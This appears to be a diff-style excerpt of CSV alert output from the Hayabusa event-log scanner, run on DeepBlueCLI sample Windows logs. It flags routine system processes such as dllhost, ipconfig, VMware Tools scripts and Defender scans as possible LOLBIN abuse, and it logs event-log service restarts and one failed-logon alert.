+2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:14:25.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
